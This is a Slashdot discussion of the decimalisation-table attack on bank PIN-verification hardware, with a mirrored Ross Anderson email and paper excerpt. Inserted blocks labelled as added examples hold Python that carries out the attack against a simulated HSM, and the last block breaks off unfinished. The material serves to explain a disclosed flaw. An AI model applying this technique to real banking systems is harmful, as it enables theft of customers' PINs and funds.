    Not exactly, there was a case of a man intercepting the transmission (hacking the land line) and telling the machine to empty itself. I'm not sure whether he got account numbers and PINs or if he just told the machine to mechanically empty all the cash. He got caught and is probably still in jail. If you want to know for sure, google for the case. I believe it was overseas. (The Netherlands somewhere maybe.)

    I do not believe there has been a case of remote compromise of ATM machines.

    1. Re:to answer your questions by Anonymous Coward · · Score: 0

      There are built-in machine-level functions in the Diebold and InterBold machines that handle physical movements. These can be hacked by management access or local physical overrides, and the machine can be made to go into 'test' mode and will happily empty out a cartridge of 20's :) I have to agree with the parent; I know of no network breaks of ATMs, but there are always the machine-side intrusions. Physical access will override any sort of security, given motivation and a little time.

      There are some ATMs using secure satellite access, kind of like the Iridium phone system, but those are rare... and in very specific high-value areas, and often temporary.

  32. PINS based on acct. number?? by cayenne8 · · Score: 2

    I got from the paper, that this attack was somehow based on PINS originally coming from an encryption of the users acct. number?? I chose my PIN number when I set up my acct....not one assigned. Don't most banks let you choose your own PIN number?

    --
    Light travels faster than sound. This is why some people appear bright until you hear them speak.........
    1. Re:PINS based on acct. number?? by DragonMagic · · Score: 1

      My bank, when you first open an account, chooses the password for you. But it's not just a hash of your account number or completely random, but it's the digits based on the telephone keypad letters of a four letter word, like BOTH, YOLK, THIS, etc.

      Then in the menu of the ATM, once the card is activated by typing in this word, you can select your new PIN.

      --

      Human nature is the same everywhere; the modes only are different. -- Earl of Chesterfield
    2. Re:PINS based on acct. number?? by IsThisNickTaken · · Score: 1

      Unfortunately not. I asked my credit union when I opened a new account if I could specify the PIN and the answer was no. They claimed they were not equipped to handle it.

      Now after reading this story, that may prove to be more than an inconvenience of having to memorize a new PIN.

    3. Re:PINS based on acct. number?? by wirelessbuzzers · · Score: 1

      My bank, when you first open an account, chooses the password for you. But it's not just a hash of your account number or completely random, but it's the digits based on the telephone keypad letters of a four letter word...

      Hm. New possibilities for dictionary attacks on cards held by 15-year-olds come to mind...

      --
      I hereby place the above post in the public domain.
    4. Re:PINS based on acct. number?? by wirelessbuzzers · · Score: 1

      Unfortunately not. I asked my credit union when I opened a new account if I could specify the PIN and the answer was no. They claimed they were not equipped to handle it.

      What's your account number?

      --
      I hereby place the above post in the public domain.
    5. Re:PINS based on acct. number?? by ahem · · Score: 1

      Your PIN gets automatically generated, then if you change it to something you like more, an offset is stored with your account number. The offset is the difference between the generated PIN and the number you chose.

      --
      Not A Sig
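  The generate-then-offset scheme ahem describes above is the IBM 3624 method: the HSM encrypts the account number under a PIN derivation key, decimalises the hex result through a 16-entry table to get a "natural" PIN, and the customer's chosen PIN is that natural PIN plus a stored offset, digit by digit. The Bond and Zielinski attack summarised in the abstract mirrored later in this thread works because the host application, not the HSM, supplies the decimalisation table and the offset to the verify command. What follows is an added example, not code from any post here, from the paper, or from any vendor's HSM: a toy HSM with that verify command, the adaptive-table attack against it, and a brute-force baseline for comparison. HMAC-SHA256 stands in for DES/3DES (an assumption so it runs on the standard library alone; the PAN and key are the paper's worked values but the PIN they produce here will not match the paper's), and the offset and the random account numbers are constructed.

```python
import hashlib
import hmac
import itertools
import random

PIN_LEN = 4
ZERO = "0" * PIN_LEN
DEFAULT_DECTAB = "0123456789012345"  # standard 3624 table: hex 0-9 to itself, A-F to 0-5

def encrypt_pan(pdk, pan):
    # Real 3624 uses DES/3DES of the PAN under the PIN derivation key; HMAC-SHA256 cut to
    # 16 hex digits is a stand-in (assumption) so this runs on the standard library alone.
    return hmac.new(pdk, pan.encode(), hashlib.sha256).hexdigest()[:16].upper()

def decimalise(hexstr, dectab):
    return "".join(dectab[int(c, 16)] for c in hexstr)

def natural_pin(pdk, pan, dectab):
    return decimalise(encrypt_pan(pdk, pan), dectab)[:PIN_LEN]

def add_offset(pin, offset):
    # customer PIN = natural PIN + offset, digit-wise modulo 10, no carry
    return "".join(str((int(a) + int(b)) % 10) for a, b in zip(pin, offset))

class ToyHSM:
    """Keeps the PIN derivation key inside and exposes only a verify command. The flaw:
    the caller (the host application, i.e. an insider) chooses the table and offset."""
    def __init__(self, pdk):
        self._pdk = pdk
        self.calls = 0  # verify commands issued so far

    def pin_verify(self, pan, trial_pin, dectab, offset):
        self.calls += 1
        return add_offset(natural_pin(self._pdk, pan, dectab), offset) == trial_pin

def indicator_table(digit, dectab=DEFAULT_DECTAB):
    # D_i: hex digits that normally decimalise to `digit` map to 1, everything else to 0
    return "".join("1" if d == str(digit) else "0" for d in dectab)

def crack_natural_pin(hsm, pan):
    """Adaptive decimalisation-table attack (after Bond and Zielinski) on pin_verify."""
    # Phase 1: with D_i, offset 0000 and trial 0000, verify succeeds exactly when digit i is
    # absent from the natural PIN, so ten calls reveal which digits it contains.
    present = [i for i in range(10) if not hsm.pin_verify(pan, ZERO, indicator_table(i), ZERO)]
    # Phase 2: under D_i the natural PIN is a 0/1 pattern marking digit i's positions. Try the
    # candidate patterns in turn; the last candidate left over is deduced, not queried.
    pin = [None] * PIN_LEN
    for n, digit in enumerate(present):
        free = [k for k in range(PIN_LEN) if pin[k] is None]
        others = len(present) - n - 1            # digits still to place after this one
        if others == 0:
            chosen = tuple(free)                 # the last digit fills whatever is left
        else:
            # this digit takes >= 1 free slot and leaves >= 1 for each remaining digit
            options = [s for r in range(1, len(free) - others + 1)
                       for s in itertools.combinations(free, r)]
            chosen = options[-1]
            for s in options[:-1]:
                trial = "".join("1" if k in s else "0" for k in range(PIN_LEN))
                if hsm.pin_verify(pan, trial, indicator_table(digit), ZERO):
                    chosen = s
                    break
        for k in chosen:
            pin[k] = digit
    return "".join(map(str, pin))

def brute_force_natural_pin(hsm, pan):
    # the attack the verify command was designed to resist: up to 10**PIN_LEN calls
    for guess in range(10 ** PIN_LEN):
        trial = f"{guess:0{PIN_LEN}d}"
        if hsm.pin_verify(pan, trial, DEFAULT_DECTAB, ZERO):
            return trial
    raise RuntimeError("natural PIN not found")

def demo(pan="8807012345691715", offset="1234", pdk=bytes.fromhex("FEFEFEFEFEFEFEFE")):
    # constructed sample: PAN and key from the paper's worked example, offset made up
    hsm = ToyHSM(pdk)
    customer_pin = add_offset(natural_pin(pdk, pan, DEFAULT_DECTAB), offset)
    natural = crack_natural_pin(hsm, pan)
    attack_calls = hsm.calls
    # the offset is stored in the clear (card track / host database), so the insider adds it
    recovered = add_offset(natural, offset)
    hsm.calls = 0
    brute_force_natural_pin(hsm, pan)
    return {"recovered": recovered, "correct": recovered == customer_pin,
            "attack_calls": attack_calls, "brute_force_calls": hsm.calls}

def average_attack_calls(samples=300, seed=1):
    # mean verify calls per PIN over constructed random PANs, plus whether every crack was right
    rng = random.Random(seed)
    pdk = bytes.fromhex("FEFEFEFEFEFEFEFE")
    hsm = ToyHSM(pdk)
    correct = True
    for _ in range(samples):
        pan = "".join(rng.choice("0123456789") for _ in range(16))
        correct &= crack_natural_pin(hsm, pan) == natural_pin(pdk, pan, DEFAULT_DECTAB)
    return hsm.calls / samples, correct
```

  Calling `demo()` recovers the customer PIN with roughly fifteen verify commands against the thousands the brute-force baseline needs, and `average_attack_calls()` shows the figure holds across random account numbers. The point the abstract makes is visible in the code: the HSM never releases the key or the clear PIN, yet because the table and offset are caller-supplied inputs rather than fixed inside the device, each answer leaks several bits about the natural PIN instead of the single yes/no the command was meant to give. The fix in later HSM firmware was to restrict which decimalisation tables the command will accept.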
  33. palme999? by Xipe66 · · Score: 0, Offtopic

    As a Swede, I'm supposed to trust someone calling himself Palme?

    How about we got a link to the submitters profile so that we can value the content of his story in perspective of what he has written in the comments previously?

    Not that I wouldn't trust a story like this normally, but I'm having some major trust issues with anyone _choosing_ a screen name that in any part contains the word "palme".

    (For everyone to whom the word "palme" means nothing, Palme was the socialist prime minister of Sweden from 1969 to 1976 and from 1982 until his assassination in 1986.)

    --
    Civilization is the process of setting man free from men.
    1. Re:palme999? by DaMa9eD · · Score: 0, Offtopic

      Despite your error with the straw man... You should realize that there is more than one Palme in the world, along with many unfortunate folks with the last name of Hitler....

      --
      Have you been DaMa9eD today?
  34. Mirror (was: Re:in case of /.) by cetan · · Score: 2, Informative

    How about this:

    http://www.phule.net/mirrors/pacc.htm

    for formatting? :)

    --
    In Soviet Russia...michael would be rotting in Siberia!
  35. Go back to sleep children by ralphus · · Score: 5, Funny
    Everything is ok.

    Your money is safe.

    The world is simple.

    You are with us or against us.

    Go buy yourself something, you deserve it.

    Those in charge know what they are doing and will take care of you.

    --
    Revolutions are never about freedom or justice. They're about who's going to be top dog. -- Kilgore Trout
    1. Re:Go back to sleep children by aussersterne · · Score: 5, Insightful

      Everything is ok.

      Your money is safe.

      The world is simple.

      You are with us or against us.

      Go buy yourself something, you deserve it.

      Those in charge know what they are doing and will take care of you.



      When I think about this, the fact that this post was modded as "insightful" by someone is perhaps the most frightening thing I've seen in a long time.
      --
      STOP . AMERICA . NOW
    2. Re:Go back to sleep children by Anonymous Coward · · Score: 0

      Did you say you sleep with children? Jacko? Is that you? Everything is ~not~ OK. My money is ~not~ safe. The world is ~not~ simple - but you are. Give me your bank acct number and I'll go buy myself something nice, after I crack your PIN;) What's the matter? If you really believed it, you'd publish your acct number, wouldn't you? Those in charge haven't a clue, and you know it!

    3. Re:Go back to sleep children by Anonymous Coward · · Score: 0

      Of course he didn't believe it. He was obviously being sarcastic. And you are a mindless git for being too stupid to realize it.

    4. Re:Go back to sleep children by Dr+Caleb · · Score: 1
      is perhaps the most frightening thing I've seen in a long time.

      Then you have not been paying attention.

      Think duct tape and plastic tarps.

      --
      "History doesn't repeat itself, but it does rhyme." Mark Twain
    5. Re:Go back to sleep children by ralphus · · Score: 2, Insightful
      When I think about this, the fact that this post was modded as "insightful" by someone is perhaps the most frightening thing I've seen in a long time.

      I agree. I'm frightened myself, and had a high level of sarcasm when I wrote it, but I feel that this basic sales pitch is done over and over again to the mass public and for the most part they buy it! The moderators probably picked up on that and agreed.

      --
      Revolutions are never about freedom or justice. They're about who's going to be top dog. -- Kilgore Trout
    6. Re:Go back to sleep children by waveman · · Score: 1

      "It is OK if we do bad things, because we are good people".

    7. Re:Go back to sleep children by MarkGriz · · Score: 1

      These aren't the droids you're looking for.

      --
      Beauty is in the eye of the beerholder.
    8. Re:Go back to sleep children by sheddd · · Score: 1

      Hmm at first I assumed this got ~3 +1 funny's and then some prankster gave it a +1 insightful as a joke... but I looked:

      Totals: +4
      50% Insightful
      30% Interesting
      20% Overrated

      Crazy.

    9. Re:Go back to sleep children by Anonymous Coward · · Score: 0

      Then you have not been paying attention.

      Think duct tape and plastic tarps.


      He said frightening, not erotic...

    10. Re:Go back to sleep children by Anonymous Coward · · Score: 0

      I am frightened by the eroticism of duct tape.

    11. Re:Go back to sleep children by Lord+Sauron · · Score: 1

      Iraq is more evil than North Korea.
      George Bush will save us from this monster.
      He is not interested in oil.
      Slashdot has no dupes.

  36. Link to PDF by FlyingCarrot · · Score: 2, Informative

    Link to PDF given in page

    Link to PDF

    --
    cthread. cthread_fork(). Fork, thread, fork!
  37. Old news by MarkGriz · · Score: 2, Funny

    A young John Connor figured out how to crack PINs way back in 1991. How is this "News" for Nerds?

    --
    Beauty is in the eye of the beerholder.
    1. Re:Old news by Anonymous Coward · · Score: 0

      I thought his mom figured it out and showed him.

    2. Re:Old news by Anonymous Coward · · Score: 0

      I thought it was some guy his mom was sleeping with showed it to her, then she showed John.

    3. Re:Old news by Anonymous Coward · · Score: 0

      lol, whoever modded this "off-topic" obviously didn't read the link and realize he was trying to be "funny"

  38. Re:Wouldn't have happened.... by doubtless · · Score: 2, Informative

    Well, taken from http://www.sophos.com/support/faqs/savos2.html:

    There are no OS/2 specific viruses in circulation but OS/2 computers can still be affected:

    * Macro viruses that infect Word, Excel and other Windows mode applications can spread as usual.
    * Boot sector viruses can affect the master boot sector, the OS/2 boot sector and the Boot Manager.
    * DOS executable file viruses can run on OS/2 systems and infect other DOS executables.
    * Any type of file can be stored on an OS/2 server and could infect a vulnerable workstation.

    So yes, there are hacks that will affect OS/2, though they might not target OS/2 exclusively.

    --
    geek page at KY speaks
  39. ATMs are fallible in lots of ways by osgeek · · Score: 5, Interesting

    With no cash in my wallet, I went to an ATM (Wells Fargo) a few months ago. I withdrew $200, and went along my merry way.

    I pulled out my wallet about an hour later. As I was thumbing through my cash to pay for something I discovered a ten dollar bill in the middle of my stack of twenties... HUH? Damned ATM machine ripped me off.

    The next time I went by a Wells Fargo branch office, I reported the problem. They mentioned that there was some complicated method for submitting a complaint. I decided that it would cost me a lot more than $10 to try to get it back.

    1. Re:ATMs are fallible in lots of ways by PhilipMatarese · · Score: 1

      Also, when you get a nice fresh stack of money, the 20s stick together. I tipped the pizza guy $24 instead of $4, but didn't notice it until the next day.

      Dammit.

    2. Re:ATMs are fallible in lots of ways by Roofus · · Score: 1

      That reminds me of the ATM where I asked for $20, and got $40 out instead. I checked my next statement to see how much it took out of my account, and it was $20! I guess I owe you and some other guy $10 each then huh?

    3. Re:ATMs are fallible in lots of ways by antiprime · · Score: 2, Interesting

      I had a similar experience, withdrew $200 and counted. The machine shorted me $20. So next time I was in the credit union, I mentioned it to a clerk. She looked up the transaction and said they had me on record as withdrawing $180, and that their ATM accounting is full of little checks and balances. I have never ever been given grief at a credit union when I questioned their ATM's accuracy. This is just one of many reasons to not deal with a large impersonal bank if you can help it. The folks at your local branch may be all personable, but when 'Corporate' barks an order from half a world away it's their job to snap to, even if it's not fair to the customers.

    4. Re:ATMs are fallible in lots of ways by cheezedawg · · Score: 1

      When I was on vacation in Europe a few years back, I was unable to withdraw money from several ATMs one day (all of the ATMs gave error messages about not being able to verify the transaction or something). Finally, we found an ATM that worked, and we went on our merry way. When we got home, there were 3 ATM withdrawals that day for the same amount when only 1 of the transactions actually finished.

      We wrote a letter to the bank, explained the situation, and a few days later they gave us a provisional credit for the extra transactions. About 2 months later we got a letter confirming that "errors" had occurred, and the provisional credit would stand.

      Total time spent- 15 minutes. Total money spent- 1 postage stamp. Luckily we didn't bounce any checks because of it- that simplified the process.

      --
      "The defense of freedom requires the advance of freedom" - George W Bush
    5. Re:ATMs are fallible in lots of ways by SamBeckett · · Score: 1

      The same thing happened to me... except I did overdraw my account. The bank was nice enough (fucking bastards) to credit the money back to my account after about two months. I won't mention any names, but their initials are KEY BANK.

    6. Re:ATMs are fallible in lots of ways by shotgunefx · · Score: 3, Funny

      I got shorted $20 once. Luckily I counted it in front of the ATM (which has a video camera, most here do) and got really pissed off.

      I held it up and counted, like there was a little guy in there, and started screaming at it. I went to my bank the next day, and they said they had to review it. A few days later they credited me. I assume one of the things they did was look at the tape.

      Now I always count it in front of the camera so if there is a problem I've got proof.

      --

      -William Shatner can be neither created nor destroyed.
    7. Re:ATMs are fallible in lots of ways by chhamilton · · Score: 1

      Sometimes this works in your favor! I was withdrawing $40 from a CIBC (Canadian bank) ATM a few years ago, and out came $120! I double checked my bank statement, and it had only withdrawn $40.

      In my case, I didn't bother to go and report the problem... ;)

    8. Re:ATMs are fallible in lots of ways by Anonymous Coward · · Score: 0

      Proof? You think that a blurry image of an acne-faced loser screaming at the camera is proof that you got ripped off?

    9. Re:ATMs are fallible in lots of ways by shotgunefx · · Score: 1

      How dare you say I have acne! :P

      But seriously, yes I do. I don't think the cameras are blurry, as AFAIK they are there to prove/disprove someone getting robbed at them, because most people who get stuck up at one of them here are reimbursed. Also to get the license plate when trucks rip them out of the walls, I imagine. Either way, I got my money with no hassle. I also don't use those shitty 3rd party ATMs, just the ones from the local banks.

      --

      -William Shatner can be neither created nor destroyed.
    10. Re:ATMs are fallible in lots of ways by aafiske · · Score: 1

      Huh. Well, for what it's worth, not all banks are so difficult to deal with. I once tried to withdraw $40 from an ATM. The little receipt that got printed out said '$40' and my account reflected $40 less, but I only got a single $20 bill.

      I called up the bank and pointed this out, and they credited my account the next day for the $20 I was missing. (This was not a local bank or credit union, btw. This was a very large banking institution.)

      If only there was an effective way of determining if the bank is nice or not _before_ you open an account...

    11. Re:ATMs are fallible in lots of ways by cybercuzco · · Score: 1

      That's why I bank at Farmers State Bank of Hamel (Hamel, MN). Their "corporate office" is literally down the street from me, so if I ever have a problem, they're very responsive (I know where most of the tellers live ;-). Small town banks generally are more responsive and screw you less than the big guys. Fewer phone solicitations too. They also give out useful things like pot holders and spatulas every so often.

      --

    12. Re:ATMs are fallible in lots of ways by Degrees · · Score: 1

      No offense, but if you let them get away with it, there is no reason for them to fix the problem.... When I balance my monthly statement and find even a six cent error, I call them up and make them change it. Sure it cost them more to answer the phone than that. But, I want them to know that when they screw up with my money, I am going to complain. It would have just cost them less just to do it right the first time.

      --
      "The most sensible request of government we make is not, "Do something!" But "Quit it!"
  40. Why is this modded up? by Dman33 · · Score: 0, Offtopic

    Informative? C'mon! I cannot read that. In fact, I stared at it cross-eyed and saw a sailship!

    IMHO, I think that was just karma-whoring FP. Anyone else would have thought to hit the preview button. Please, if you are going to mirror or post the text, please preview and make sure it will not throw somebody into seizures...

  41. Mirror: Formatted Correctly by purduephotog · · Score: 2, Informative


    Updated 20 February 2003


    18 February 2003



    To: ukcrypto@chiark.greenend.org.uk
    Subject: Citibank tries to gag crypto bug disclosure
    Date: Thu, 20 Feb 2003 09:57:34 +0000
    From: Ross Anderson <Ross.Anderson@cl.cam.ac.uk>

    Citibank is trying to get an order in the High Court today gagging public disclosure of crypto vulnerabilities:

    http://www.cl.cam.ac.uk/ftp/users/rja14/citibank_gag.pdf

    I have written to the judge opposing the order:

    http://www.cl.cam.ac.uk/ftp/users/rja14/citibank_response.pdf

    The background is that my student Mike Bond has discovered some really horrendous vulnerabilities in the cryptographic equipment commonly used to protect the PINs used to identify customers to cash machines:

    http://www.cl.cam.ac.uk/TechReports/UCAM-CL-TR-560.pdf

    These vulnerabilities mean that bank insiders can almost trivially find out the PINs of any or all customers. The discoveries happened while Mike and I were working as expert witnesses on a `phantom withdrawal' case.

    The vulnerabilities are also scientifically interesting:

    http://cryptome.org/pacc.htm

    For the last couple of years or so there has been a rising tide of phantoms. I get emails with increasing frequency from people all over the world whose banks have debited them for ATM withdrawals that they deny making. Banks in many countries simply claim that their systems are secure and so the customers must be responsible. It now looks like some of these vulnerabilities have also been discovered by the bad guys. Our courts and regulators should make the banks fix their systems, rather than just lying about security and dumping the costs on the customers.

    Curiously enough, Citi was also the bank in the case that set US law on phantom withdrawals from ATMs (Judd v Citibank). They lost. I hope that's an omen, if not a precedent ...
    _____

    Abstract

    We present an attack on hardware security modules used by retail banks for the secure storage and verification of customer PINs in ATM (cash machine) infrastructures. By using adaptive decimalisation tables and guesses, the maximum amount of information is learnt about the true PIN upon each guess. It takes an average of 15 guesses to determine a four digit PIN using this technique, instead of the 5000 guesses intended. In a single 30 minute lunch-break, an attacker can thus discover approximately 7000 PINs rather than 24 with the brute force method. With a $300 withdrawal limit per card, the potential bounty is raised from $7200 to $2.1 million and a single motivated attacker could withdraw $30-50 thousand of this each day. This attack thus presents a serious threat to bank security.

    -- Mike Bond and Piotr Zielinski
    Decimalisation table attacks for PIN cracking
    February 2003

    -----

    From: Ross Anderson <Ross.Anderson@cl.cam.ac.uk>
    To: ukcrypto@chiark.greenend.org.uk
    Subject: Yet another failure of commercial cryptographic equipment
    Date: Tue, 18 Feb 2003 17:52:13 +0000

    I gave a talk at Cambridge yesterday in which I described a new and interesting family of attacks on cryptographic equipment. These attacks defeat machines such as the Racal RG7000 and the IBM 4758/CCA which are commonly used to protect the PINs and keys used in automatic teller machines.

    The paper is available online at:

    http://research.microsoft.com/~aherbert/volume63.pdf [4.8MB]

    as pages 27-30 in the PDF. [HTML below]

    I got a fax yesterday informing me that an application is to be brought in the High Court, it seems by Citibank, on Thursday 20th February for `relief in relation to the protection of information which they accept as being confidential and which ought not to be in the public domain.'

    I hope that no English court would go so far as to censor already published material. However, one just can't tell these days ...



    Protocol Analysis, Composability and Computation


    Ross Anderson, Michael Bond

    University of Cambridge, England



    Security protocols early days


    The study of security protocols has been associated with Roger Needham since 1978, when he published the seminal paper on the subject with Mike Schroeder [1]. The problem they investigated was how to distribute cryptographic keys in a network of computers. One solution is to have an authentication service with which all the principals share a key; then if Alice wants to chat with Bob (for example) she can call the service and get two encrypted messages containing the same session key: one encrypted under the key she shares with the service so she can read it, and one encrypted under the key Bob shares with the service so Bob can read it. She can now send the second of these to Bob to establish secure communication. The mechanism that Needham and Schroeder designed for this evolved into Kerberos, which is now part of Windows and is probably the most widely used of all authentication protocols.


    Security protocols are now embedded in a great many applications, but it is common to find unexpected bugs in them. For example, many banks used to encrypt each customer's PIN using a key known to their ATMs and write it on the ATM card magnetic strip. The idea was to provide a limited service when the network was down. Years later, a villain discovered that the account number and the encrypted PIN were not linked: he could make up a bank card with his own encrypted PIN but someone else's account number, and loot their account. He went on to steal a lot of money, and once in prison wrote a manual telling everyone else how to do it too. The banks had to spend millions on changing their systems.


    Clarifying the assumptions


    Researchers started to gnaw away at the protocols described in the literature and found fault with essentially all of them. The failure to bind protocol elements was one frequent problem; another was that old messages could be replayed. In the case of the original Needham-Schroeder protocol, for example, the freshness of the key generated by the server was guaranteed to only one of the principals. This was not necessarily an attack, as its inventors only claimed to protect honest insiders from dishonest outsiders. However, it led to a debate about the assumptions underlying security protocol design. Do we protect only against outsiders, or against insiders? Against the malicious, or the merely careless? For example, if we use timestamps to guarantee protocol freshness, are we vulnerable to principals who carelessly let their clocks run slow? Do we only consider an attacker to have won if he can impersonate an authorised principal, or do we need to stop people abusing the protocol mechanisms to perform a service denial attack?


    The early attacks led to a second seminal paper, which Roger wrote with Mike Burrows and Martin Abadi in 1989 [2], and which introduced a logic of authentication. This enables an analyst to formalise the assumptions and goals of a security protocol, and to attempt to prove its correctness. When a proof cannot be found, the place at which one gets stuck often shows where an attack can be mounted. This style of analysis turned out to be very powerful, and a large literature quickly developed in which the BAN Logic and other formal tools were developed and extended to tackle a range of problems in protocol design.


    One of the remarkable things about the study of security protocols is that they have not become a solved problem. One might think that managing the objects associated with authenticating users over a network (passwords, keys and the like) was a fairly compact problem which would have been done to death within a few years. However, the more we dig, the more we find.


    Since 1992, Roger has hosted a protocols workshop every Easter. Early events dwelled on matters of authentication and logic, but by the mid-90s, the growing interest in electronic commerce was yielding papers on mechanisms for micropayments, bets, streaming media, mobile communications and electronic voting. Later years brought work on PKI, trust management and copyright enforcement. More and more problems come along as more and more businesses reinvent themselves online; threat models have also become more realistic, with dishonest insiders displacing the mythical evil hacker on the Internet.


    Dishonest insiders, and the composition problem


    Over the last two years, we have been exploring exactly how one might re-engineer cryptography to cope with dishonest insiders. One conclusion is that the analysis of security protocols must be extended to application programming interfaces. This is because the crypto keys used in authentication and payment protocols are often kept in separate hardware security processors, or at least in cryptographic libraries, to which access can be restricted using physical or logical mechanisms. However, an interface has to be exposed to the application program, which will occasionally be suborned whether by a corrupt insider, or by malware. How much harm can be done, and how can we limit it?


    Protecting protocols was hard enough, and yet the typical protocol consists of 3-5 messages exposed to manipulation. The API of a modern crypto library or hardware cryptoprocessor may contain 30-500 callable functions, many with a range of options. This provides a very rich and complex environment for mischief.


    Attacks often involve using two separate mechanisms provided by the cryptoprocessor for different purposes, each of which could be innocuous by itself but which combine to cause trouble. For example, it is common to compute a customer PIN by encrypting the account number with a PIN derivation key: the cryptoprocessor then returns the PIN encrypted with a PIN storage key, so that the application has no access to its clear value. So far, so good. Then there is another transaction that can be used to encrypt a communications key under the terminal key loaded in an ATM. Here things start to go wrong, as the cryptoprocessor does not distinguish between a terminal key and a PIN derivation key; it considers them both to be of the same type. The upshot is that an attacker can supply the device with an account number, claiming that it is a communications key, and ask for it to be encrypted under the PIN derivation key.


    Attacks like this extend protocol analysis all the way to the composition problem: the problem that connecting two systems that are secure in isolation can give a composite system that leaks. This had previously been seen as a separate issue, tackled with different conceptual tools.


    Differential protocol analysis


    We are now working on the second generation of API attacks, which exploit the application syntax supported by the cryptographic service. These attacks are even more powerful, and at least as interesting from the scientific point of view. PIN generation provides a neat example here too. In more detail, the standard PIN computation involves writing the result of the encryption as a hex string and decimalising it. As some banks like to let customers change their PIN to a more memorable number, there is a provision to add an offset to give the PIN that the customer actually enters:
    Account number: 8807 0123 4569 1715
    PIN derivation key: FEFE FEFE FEFE FEFE
    Encrypted account number: A2CE 126C 69AE C82D
    Natural (decimalised) PIN: 0224
    Offset: 6565
    Customer PIN: 6789


    The typical implementation requires the programmer to send the cryptoprocessor the account number, a table describing the decimalisation (here, 0123 4567 8901 2345) and the offset. The processor returns the PIN, encrypted under the PIN storage key. The designers do not seem to have realised that a crooked programmer can manipulate the decimalisation table and the offset as well as the account number. A multitude of attacks follow. For example, one can send in an account number with a decimalisation table of 1111...11 to find out the ciphertext corresponding to a clear PIN of 1111, and then with a decimalisation table of 0111...11 to see if there is a zero in the first four digits of the encrypted account number (if so, the PIN, and thus the ciphertext output, will be different). By manipulating the decimalisation table further, he can get all the digits in the PIN, and by then playing with the offset he can get their order. In total, the attack requires only 15-25 unprivileged cryptoprocessor transactions to discover the PIN on a single target account.


    This second type of attack takes protocol analysis into yet another realm: that of differential attacks. Over the last ten years, a number of techniques have been invented for attacking cryptographic systems by bombarding them with inputs with chosen differences.


    For example, in differential cryptanalysis, one analyses the changes in the output of the encryption algorithm; while with differential power analysis, one measures changes in the current consumption or electromagnetic emissions of the equipment. Now we have examples of how consecutive runs of a protocol can leak information if the inputs are suitably chosen. The resulting differential protocol analysis appears to be very powerful against application-level crypto.


    It will take us some time to figure out the general lessons to be drawn from attacks like this, the robustness principles that designers should use to avoid them, and the analysis techniques that might assure us of a particular design's soundness. The randomisation of all protocols (another feature of Roger's work) is likely to be important.


    Quantitative analysis and multiparty computation


    Various researchers have speculated about whether there might one day be a quantitative analysis of protocol security. This might be feasible for PIN processing applications as we can measure the information leakage per transaction in terms of the reduction of entropy in the unknown PIN. This leads in turn to a possible real-world application of an attack previously considered theoretical.


    Gus Simmons wrote extensively on covert channels in protocols. One such channel that is always present is the balking channel, when one of the principals in a protocol signals something by halting and refusing to continue. This is normally considered unimportant as its information capacity is only a third of a bit per transaction. But with systems designed to cope with large transaction volumes, this need no longer hold. For example, a Trojanned cryptoprocessor could balk when it sees a predetermined PIN. If the PIN length were eight digits, this would be unlikely to hinder normal operation, but at a thousand transactions a second, a programmer could quickly find a number in a typical nine-digit account number range with just this PIN, and open an account for it. Once this kind of problem is appreciated, one can start to look for attacks that involve inducing rare error conditions that cause the cryptoprocessor to abort a transaction. (They exist.)


    A third emerging link is between protocol analysis and secure multiparty computation. In application-level crypto we may have several inputs to a computation, some of them coming from an untrusted source, and we have to stop users manipulating the computation to get outputs useful for bad purposes. In the PIN decimalisation example above, one might try to solve the problem by blocking tables such as 1111...11. Yet an attacker can get by with scarcely more work by using two normal-looking tables that differ slightly (another kind of differential attack). We might therefore think that if we can't sanitize the inputs to the computation, perhaps we can authenticate them, and use only those tables that real banks actually use. But building every bank in the world into our trust base is what we were trying to avoid by using cryptography!


    Conclusion


    The protocol work that started off a quarter of a century ago may have seemed at the time like a minor detail within the larger project of designing robust distributed systems. Yet it has already grown into the main unifying theme of security engineering. Application-level protocols, and especially those from which an attacker can harvest data over many runs, open up new problems. The resulting analysis techniques are set to invade the world of composable security, and the world of multiparty computation. The influence, and the consequences, of Roger's contribution just keep on growing.


    References


    1. NEEDHAM, R.M. AND SCHROEDER, R.M., Using encryption for authentication in large networks of computers. Comm. ACM, vol. 21, no. 12, pp. 993-999, 1978.


    2. BURROWS, M., ABADI, M. AND NEEDHAM, R.M., A logic of authentication, ACM Transactions on Computer Systems, vol. 8, no. 1, pp. 18-36, 1990.
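
The PIN derivation and decimalisation-table discussion above, as an added example that is not part of the original post or of the Anderson/Bond paper: it reproduces the page's worked numbers (decimalising A2CE 126C 69AE C82D gives 0224, and offset 6565 gives 6789), models the verify call as a yes/no oracle, measures in bits what one caller-chosen table leaks (the quantitative view the text proposes), and ends with the allow-list check the text discusses as a mitigation. The DES step is not reproduced, and the function names and the `allowed_tables` configuration are assumptions.

```python
"""IBM 3624-style PIN derivation (decimalisation table + offset), a model of the
HSM verify call in which table and offset are caller-controlled, and a per-query
leakage measure in bits.

Added example; not code from the original post or from the Anderson/Bond paper.
The DES step is not reproduced: the encrypted account number is the value given
in the page's worked example and is treated as an input.
"""
from math import log2

STANDARD_TABLE = "0123456789012345"      # the decimalisation table shown on the page
EXAMPLE_CIPHERTEXT = "A2CE126C69AEC82D"  # encrypted account number from the page
EXAMPLE_OFFSET = "6565"                  # offset from the page's worked example


def decimalise(hex_digits: str, table: str, length: int = 4) -> str:
    """Map the leading hex digits of the ciphertext through a 16-entry table."""
    if len(table) != 16 or not table.isdigit():
        raise ValueError("decimalisation table must be 16 decimal digits")
    return "".join(table[int(h, 16)] for h in hex_digits[:length])


def add_offset(natural_pin: str, offset: str) -> str:
    """Digit-wise addition modulo 10, no carry, as in the 3624 scheme."""
    return "".join(str((int(a) + int(b)) % 10) for a, b in zip(natural_pin, offset))


def customer_pin(ciphertext: str, table: str, offset: str) -> str:
    """Natural PIN plus offset: the PIN the customer actually enters."""
    return add_offset(decimalise(ciphertext, table), offset)


def verify(ciphertext: str, table: str, offset: str, trial_pin: str) -> bool:
    """Model of the verify transaction as a yes/no oracle (equivalent to comparing
    the encrypted PINs a generation call returns). Only the ciphertext is secret;
    table, offset and trial PIN are all chosen by the caller."""
    return customer_pin(ciphertext, table, offset) == trial_pin


def all_hex_prefixes(length: int = 4) -> list:
    """Every value of the first `length` hex digits of the ciphertext: the hidden
    state the oracle actually depends on (16**4 = 65536 possibilities)."""
    return [format(i, "0%dX" % length) for i in range(16 ** length)]


def query_leakage_bits(candidates, table, offset, trial_pin):
    """Bits one yes/no answer reveals about the hidden prefix, given the candidates
    still consistent with earlier answers: the binary entropy of P(yes). Because
    the PIN is a function of the prefix, this also bounds what is learnt about it.
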